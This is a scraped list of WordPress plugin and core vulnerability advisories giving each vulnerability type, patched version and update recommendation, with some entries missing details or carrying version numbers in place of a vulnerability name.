Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 0.5.3
Recommended Action: Update to version 0.5.3, or a newer patched version

Plugin: reCaptcha by BestWebSoft

Vulnerability: CAPTCHA Bypass
Patched Version: 1.13
Recommended Action: Update to version 1.13, or a newer patched version

Plugin: Optin Forms – Simple List Building Plugin for WordPress

Plugin: Business Directory Plugin – Easy Listing Directories for WordPress

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 5.11
Recommended Action: Update to version 5.11, or a newer patched version

Plugin: WP Easy Gallery – WordPress Gallery Plugin

Vulnerability: SQL Injection
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: Author Bio Box

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Missing Authorization via ajax_delete_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: All In One Redirection

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: YOP Poll

Vulnerability: Race Condition to Vote Manipulation
Patched Version: 6.5.27
Recommended Action: Update to version 6.5.27, or a newer patched version

Plugin: WP Attachments

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.0.5
Recommended Action: Update to version 5.0.5, or a newer patched version

Plugin: Traffic Manager

Plugin: Leadster

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Insert Special Characters

Vulnerability: Prototype Pollution
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button, WhatsApp – Chaty

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Cross-Site Request Forgery to File Upload
Patched Version: 21.3
Recommended Action: Update to version 21.3, or a newer patched version

Plugin: cformsII

Vulnerability: SQL Injection
Patched Version: 14.6.10
Recommended Action: Update to version 14.6.10, or a newer patched version

Plugin: External Links – nofollow, noopener & new window

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.81
Recommended Action: Update to version 1.81, or a newer patched version

Plugin: WP Debugging

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.11.8
Recommended Action: Update to version 2.11.8, or a newer patched version

Plugin: Age Gate

Vulnerability: Cross-Site Scripting via Data Import
Patched Version: 2.17.1
Recommended Action: Update to version 2.17.1, or a newer patched version

Plugin: WP Inventory Manager

Vulnerability: Reflected Cross-Site Scripting via ‘message’
Patched Version: 2.1.0.12
Recommended Action: Update to version 2.1.0.12, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Authenticated Blind SQL Injection
Patched Version: 9.4.1
Recommended Action: Update to version 9.4.1, or a newer patched version

Plugin: Ultimate Addons for Contact Form 7

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Unauthenticated PHP Object Injection via Cookies
Patched Version: 4.4.7
Recommended Action: Update to version 4.4.7, or a newer patched version

Plugin: Contact Form Manager

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Product page shipping calculator for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via admin settings
Patched Version: 1.3.26
Recommended Action: Update to version 1.3.26, or a newer patched version

Plugin: ActivityPub

Vulnerability: Missing Authorization
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: WordPress RokBox

Vulnerability: Content Spoofing
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: My YouTube Channel

Vulnerability: Cross-Site Request Forgery to Cache Deletion
Patched Version: 3.23.4
Recommended Action: Update to version 3.23.4, or a newer patched version

Plugin: IdeaPush

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 8.53
Recommended Action: Update to version 8.53, or a newer patched version

Plugin: Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button, WhatsApp – Chaty

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: Font Awesome

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 4.3.2
Recommended Action: Update to version 4.3.2, or a newer patched version

Plugin: Lana Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Points and Rewards for WooCommerce – Create Loyalty Programs, Reward Customer Purchases, Point Rewards, Referral Points, Reward for Points, User Badges, and Gamification

Vulnerability: Cross-Site Request Forgery to Settings Change
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Master Elements

Vulnerability: Unauthenticated SQL injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Page Builder: KingComposer – Free Drag and Drop page builder by King-Theme

Plugin: ARI Stream Quiz – WordPress Quizzes Builder

Vulnerability: Authenticated (Contributor+) PHP Object Injection
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: WooCommerce Product Table Lite

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Broadcast Live Video – Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP

Vulnerability: Cross-Site Scripting
Patched Version: 4.29.5
Recommended Action: Update to version 4.29.5, or a newer patched version

Plugin: Radio Station by netmix® – Manage and play your Show Schedule in WordPress!

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: ShiftNav – Responsive Mobile Menu

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: EmbedPress – Embed PDF, PDF 3D FlipBook, Instagram Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Maps & Upload PDF Documents

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8.4
Recommended Action: Update to version 3.8.4, or a newer patched version

Plugin: Post Views Count (Support caching plugins!)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Gallery by Ays – Responsive Image Gallery

Vulnerability: Responsive Image Gallery <= 4.4.3
Patched Version: 4.4.4
Recommended Action: Update to version 4.4.4, or a newer patched version

Plugin: MainWP Code Snippets Extension

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Simple Blog Card

Vulnerability: Sensitive Information Exposure
Patched Version: 1.32
Recommended Action: Update to version 1.32, or a newer patched version

Plugin: ANAC XML Bandi di Gara

Vulnerability: Cross-Site Request Forgery via settings.php
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: DVS Custom Notification

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Author+ Stored Cross-Site Scripting
Patched Version: 5.7.8
Recommended Action: Update to version 5.7.8, or a newer patched version

Plugin: WSM Downloader

Plugin: Solidres – Hotel booking plugin for WordPress

Plugin: NotificationX – Live Sales Notification, WooCommerce Sales Popup, FOMO, Social Proof, Announcement Banner & Floating Notification Top Bar

Vulnerability: SQL Injection
Patched Version: 2.3.12
Recommended Action: Update to version 2.3.12, or a newer patched version

Plugin: Product Catalog Simple

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.5.13
Recommended Action: Update to version 1.5.13, or a newer patched version

Core: WordPress

Vulnerability: Privilege Escalation via XML-RPC
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.7, 5.2.8, 5.3.5, 5.4.3, 5.5.2

Plugin: Watu Quiz

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.8.2
Recommended Action: Update to version 3.3.8.2, or a newer patched version

Plugin: WooCommerce

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.6.9
Recommended Action: Update to version 2.6.9, or a newer patched version

Plugin: Securimage-WP

Plugin: Tidio Gallery

Plugin: WHA Puzzle

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP htpasswd

Vulnerability: Authenticated (Admin+) Stored Cross Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Share Buttons by Supsystic

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: Email Newsletter

Vulnerability: Sensitive Information Disclosure
Patched Version: 9.0
Recommended Action: Update to version 9.0, or a newer patched version

Plugin: iframe

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ‘iframe’ Shortcode
Patched Version: 4.7
Recommended Action: Update to version 4.7, or a newer patched version

Plugin: MC4WP: Mailchimp for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.8.5
Recommended Action: Update to version 4.8.5, or a newer patched version

Plugin: WP Hotel Booking

Vulnerability: Insufficient Authorization to Unauthorized Post Deletion
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Fast Flow

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.12
Recommended Action: Update to version 1.2.12, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.7.34
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.34, 3.8.34, 3.9.32, 4.0.31, 4.1.31, 4.2.28, 4.3.24, 4.4.23, 4.5.22, 4.6.19, 4.7.18, 4.8.14, 4.9.15, 5.0.10, 5.1.6, 5.2.7, 5.3.4, 5.4.2

Plugin: Appointment Hour Booking – WordPress Booking Plugin

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.3.56
Recommended Action: Update to version 1.3.56, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: WP Insurance – WordPress Insurance Service Plugin

Vulnerability: Cross-Site Request Forgery leading to Arbitrary Plugin Activation
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: tagDiv Composer

Vulnerability: Reflected Cross-Site Scripting via ‘td_video_url’
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: WP Total Hacks

Vulnerability: Authenticated (Subscriber+) Plugin Options Update to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YITH WooCommerce Wishlist

Vulnerability: SQL Injection
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: WP Content Pilot – Autoblogging & Affiliate Marketing Plugin

Vulnerability: Authenticated (Contributor+) Content Injection
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Visual Form Builder

Vulnerability: Cross-Site Request Forgery to SQL Injection
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: WP RSS By Publishers

Plugin: WCFM Membership – WooCommerce Memberships for Multivendor Marketplace

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.10.0
Recommended Action: Update to version 2.10.0, or a newer patched version

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: SQL Injection
Patched Version: 0.5.16
Recommended Action: Update to version 0.5.16, or a newer patched version

Plugin: WP Flipclock

Vulnerability: Authenticated (Contributor+) Stored Cross Site Scripting
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Rate My Post – Star Rating Plugin by FeedbackWP

Vulnerability: Race Condition
Patched Version: 3.3.5
Recommended Action: Update to version 3.3.5, or a newer patched version

Plugin: Stock Manager for WooCommerce

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: Ninja Job Board – Ultimate WordPress Job Board Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Caldera Forms – More Than Contact Forms

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Workscout Core

Vulnerability: Job Board WordPress Theme <= 2.0.31
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: WP-Members Membership Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.10
Recommended Action: Update to version 2.8.10, or a newer patched version

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.10
Recommended Action: Update to version 2.7.10, or a newer patched version

Plugin: Rearrange Woocommerce Products

Vulnerability: Subscriber+ SQL Injection
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: WP Maintenance Mode & Site Under Construction

Vulnerability: Improper Authorization
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: GigPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.3.28
Recommended Action: Update to version 2.3.28, or a newer patched version

Plugin: Stylish Price List – Price Table Builder & QR Code Restaurant Menu

Vulnerability: Missing Authorization
Patched Version: 6.9.1
Recommended Action: Update to version 6.9.1, or a newer patched version

Plugin: Admin Bar & Dashboard Access Control

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Owl Carousel

Vulnerability: Missing Authorization via save_paramter.php
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Media File Manager

Vulnerability: Directory Traversal to Arbitrary File Read
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Contextual Related Posts

Vulnerability: Missing Authorization in crp_ajax_clearcache
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: OpenHook

Vulnerability: Authenticated (Subscriber+) Remote Code Execution via Shortcode
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: Error Log Viewer by BestWebSoft

Vulnerability: Arbitrary File Deletion
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: IP Blacklist Cloud

Vulnerability: SQL Injections
Patched Version: 3.41
Recommended Action: Update to version 3.41, or a newer patched version

Plugin: Product Stock Manager

Vulnerability: Missing Authorization and Cross-Site Request Forgery
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Checkout Field Manager (Checkout Manager) for WooCommerce

Vulnerability: Unauthenticated Arbitrary Media Deletion
Patched Version: 4.3
Recommended Action: Update to version 4.3, or a newer patched version

Plugin: Easy Google Analytics for WordPress

Plugin: Official Integration for Billingo

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 4.68
Recommended Action: Update to version 4.68, or a newer patched version

Plugin: Simple Job Board

Vulnerability: No subtitle
Patched Version: 2.9.5
Recommended Action: Update to version 2.9.5, or a newer patched version

Plugin: BA Book Everything

Vulnerability: Cross-Site Scripting and Cross-Frame Scripting
Patched Version: 1.3.25
Recommended Action: Update to version 1.3.25, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via title_size
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: WP Live.php

Vulnerability: Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: WP Default Feature Image

Core: WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.7.30
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.30, 3.8.30, 3.9.28, 4.0.27, 4.1.27, 4.2.24, 4.3.20, 4.4.19, 4.5.18, 4.6.15, 4.7.14, 4.8.10, 4.9.11, 5.0.6, 5.1.2, 5.2.3

Plugin: EazyDocs – Most Powerful Knowledge base, wiki, Documentation Builder Plugin

Vulnerability: Unauthenticated Stored Cross-Site Scripting via edit_doc_one_page
Patched Version: 2.3.6
Recommended Action: Update to version 2.3.6, or a newer patched version

Plugin: Post SMTP – WordPress SMTP Plugin with Email Logs and Mobile App for Failure Notifications – Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES and more

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: mb.miniAudioPlayer – an HTML5 audio player for your mp3 files

Plugin: Countdown, Coming Soon, Maintenance – Countdown & Clock

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: Login with phone number

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Everest Forms – Build Contact Forms, Surveys, Polls, Quizzes, Newsletter & Application Forms, and Many More with Ease!

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Plausible Analytics

Vulnerability: Missing Authorization
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Blog Manager Light

Vulnerability: Cross-Site Request Forgery via bml_settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Automatic Domain Changer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: White Label – WordPress Custom Admin, Custom Login Page, and Custom Dashboard

Vulnerability: Cross-Site Request Forgery via white_label_reset_wl_admins
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: WatchTowerHQ

Vulnerability: Unauthenticated Arbitrary File Deletion
Patched Version: 3.6.16
Recommended Action: Update to version 3.6.16, or a newer patched version

Plugin: Analytics for Woo – Putler Accurate Analytics and Reports for your WooCommerce Store

Vulnerability: Missing Authorization via ‘send_resync_request’
Patched Version: 2.13.0
Recommended Action: Update to version 2.13.0, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Authenticated (Seo Manager+) Stored Cross-Site Scripting
Patched Version: 21.1
Recommended Action: Update to version 21.1, or a newer patched version

Plugin: surveys

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in saveconfig function
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: tagDiv Composer

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: RokNewsPager

Vulnerability: Denial of Service
Patched Version: 1.18
Recommended Action: Update to version 1.18, or a newer patched version

Plugin: SS Downloads

Vulnerability: Cross-Site Scripting
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Return Refund and Exchange For WooCommerce – Return Management System, RMA Exchange, Wallet And Cancel Order Features

Vulnerability: Arbitrary File Upload
Patched Version: 4.0.9
Recommended Action: Update to version 4.0.9, or a newer patched version

Plugin: Easy PayPal Events

Vulnerability: Reflected Cross-Site Scripting via Page
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Booking Package

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.11
Recommended Action: Update to version 1.5.11, or a newer patched version

Plugin: OTP Login Woocommerce (Login with OTP)

Vulnerability: Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Missing Authorization
Patched Version: 4.2.3.1
Recommended Action: Update to version 4.2.3.1, or a newer patched version

Core: WordPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via Customizer
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Plugin: Leaflet Maps Marker Pro

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Enable Media Replace

Vulnerability: Authenticated (Author+) Arbitrary File Upload
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: Visual Slide Box Builder

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Addons for Beaver Builder

Vulnerability: Authenticated(Contributor+) Directory Traversal to Arbitrary File Download
Patched Version: 1.35.14
Recommended Action: Update to version 1.35.14, or a newer patched version

Plugin: Booster Plus for WooCommerce

Vulnerability: Missing Authorization to Order Information Disclosure
Patched Version: 7.1.2
Recommended Action: Update to version 7.1.2, or a newer patched version

Plugin: Simple Calendar – Google Calendar Plugin

Vulnerability: Cross-Site Request Forgery via duplicate_feed
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Core: WordPress

Vulnerability: Directory Traversal
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Core: WordPress

Vulnerability: 6.3.1
Patched Version: 4.7.27
Recommended Action: Update to one of the following versions, or a newer patched version: 4.7.27, 4.8.23, 4.9.24, 5.0.20, 5.1.17, 5.2.19, 5.3.16, 5.4.14, 5.5.13, 5.6.12, 5.7.10, 5.8.8, 5.9.8, 6.0.6, 6.1.4, 6.2.3, 6.3.2

Plugin: gravity-file-ajax-upload-free

Vulnerability: Unrestricted File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Companion Auto Update

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Waiting: One-click countdowns

Vulnerability: Missing Authorization Checks leading to Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 10Web Social Post Feed

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.1.27
Recommended Action: Update to version 1.1.27, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Authenticated (Admin+) Cross-Site Scripting via label
Patched Version: 3.6.10
Recommended Action: Update to version 3.6.10, or a newer patched version

Plugin: Visual Composer Website Builder

Vulnerability: Authenticated Stored Cross-Site Scripting via ‘Text Block’
Patched Version: 45.0.1
Recommended Action: Update to version 45.0.1, or a newer patched version

Plugin: Multi Step Form

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Database for Contact Form 7, WPforms, Elementor forms

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 7.32
Recommended Action: Update to version 7.32, or a newer patched version

Plugin: Simple Basic Contact Form

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 20221201
Recommended Action: Update to version 20221201, or a newer patched version

Plugin: TemplatesNext ToolKit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.2.9
Recommended Action: Update to version 3.2.9, or a newer patched version

Plugin: WPGraphQL

Vulnerability: Authenticated (Editor+) Server-Side Request Forgery
Patched Version: 1.14.6
Recommended Action: Update to version 1.14.6, or a newer patched version

Plugin: Accept Donations with PayPal & Stripe

Vulnerability: Reflected Cross-Site Scripting via Page
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Job Board by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WPGet API – Connect to any external REST API

Vulnerability: 2.2.1
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Missing Authorization
Patched Version: 1.0.99
Recommended Action: Update to version 1.0.99, or a newer patched version

Plugin: Form Builder | Create Responsive Contact Forms

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.9.8.4
Recommended Action: Update to version 1.9.8.4, or a newer patched version

Plugin: Easy Appointments

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.11.0
Recommended Action: Update to version 3.11.0, or a newer patched version

Plugin: Foliopress WYSIWYG

Vulnerability: Cross-Site Scripting
Patched Version: 2.6.8.5
Recommended Action: Update to version 2.6.8.5, or a newer patched version

Plugin: VK All in One Expansion Unit

Vulnerability: Reflected Cross-Site Scripting via REQUEST_URI
Patched Version: 9.87.1.0
Recommended Action: Update to version 9.87.1.0, or a newer patched version

Plugin: WP Email Users

Vulnerability: SQL Injection
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Social Slider Feed

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: BNG Gateway For WooCommerce

Plugin: YouTube Video Inserter

Plugin: Online Lesson Booking

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.8.7
Recommended Action: Update to version 0.8.7, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Missing Authorization Checks
Patched Version: 6.4.1
Recommended Action: Update to version 6.4.1, or a newer patched version

Plugin: WordPress Email Marketing Plugin – WP Email Capture

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.10
Recommended Action: Update to version 3.10, or a newer patched version

Plugin: Simple Page Transition

Vulnerability: Stored Cross Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP RSS By Publishers

Plugin: KiviCare – Clinic & Patient Management System (EHR)

Vulnerability: Sensitive Information Exposure
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: WP Reroute Email

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.4.8
